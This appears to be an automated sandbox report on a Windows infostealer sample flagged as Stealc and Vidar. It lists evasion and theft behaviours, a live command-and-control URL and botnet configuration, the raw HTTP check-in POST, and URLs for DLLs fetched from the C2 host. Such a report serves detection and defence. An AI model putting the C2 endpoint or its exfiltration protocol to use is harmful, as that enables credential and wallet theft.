Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1521305
MD5:	780720dd7e3b1cec8e5da391c946b80f
SHA1:	01d37c7414ac9db385b6f44db0f5a6feb1cce2d1
SHA256:	145d77a1362f477b2084f18bd09da64330fda9cf41a7b1c405466b3a9950a3df
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 780720DD7E3B1CEC8E5DA391C946B80F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1917116646.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1689803053.0000000004D60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 6936	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6936	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 6936	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6936	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.3c0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T07:32:02.896715+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T07:32:02.890638+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T07:32:03.117970+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T07:32:04.209777+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T07:32:03.124752+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T07:32:02.663504+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T07:32:04.683892+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:10.159562+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:11.210096+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:11.832016+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:12.358400+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:14.040618+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-28T07:32:14.425198+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 44 38 31 31 32 43 34 42 39 33 33 31 35 38 38 32 31 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 2d 2d 0d 0a Data Ascii: ------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="hwid"AED8112C4B933158821099------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="build"save------AEGHJKJKKJDHIDHJKJDB--

Source: file.exe, 00000000.00000002.1917116646.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1917116646.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1917116646.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1917116646.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1917116646.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll5
Source: file.exe, 00000000.00000002.1917116646.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1917116646.0000000000E92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlls
Source: file.exe, 00000000.00000002.1917116646.0000000000E92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll~
Source: file.exe, 00000000.00000002.1917116646.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1917116646.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dlly
Source: file.exe, 00000000.00000002.1917116646.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1917116646.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1917116646.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllo
Source: file.exe, 00000000.00000002.1917116646.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1917116646.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/AS
Source: file.exe, 00000000.00000002.1917116646.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1917116646.0000000000E92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php-
Source: file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php:
Source: file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=C9
Source: file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpBRj
Source: file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpCOF
Source: file.exe, 00000000.00000002.1917116646.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpCoinomi
Source: file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_U
Source: file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpnte
Source: file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpog
Source: file.exe, 00000000.00000002.1917116646.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1917116646.0000000000E92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
Source: file.exe, 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1917116646.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37u#
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1929460655.000000001D4C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938299746.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: FIDHIEBA.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1917116646.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1917116646.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: FIDHIEBA.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FIDHIEBA.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FIDHIEBA.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1917116646.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1917116646.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: FIDHIEBA.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FIDHIEBA.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FIDHIEBA.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HJKJEHJKJEBGHJJKEBGI.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	String found in binary or memory: https://support.mozilla.org
Source: FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000003.1769597947.000000001D3CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000003.1769597947.000000001D3CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Visual
Source: file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1917116646.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: FIDHIEBA.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1917116646.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: FIDHIEBA.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1850609393.00000000297E2000.00000004.00000020.00020000.00000000.sdmp, FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
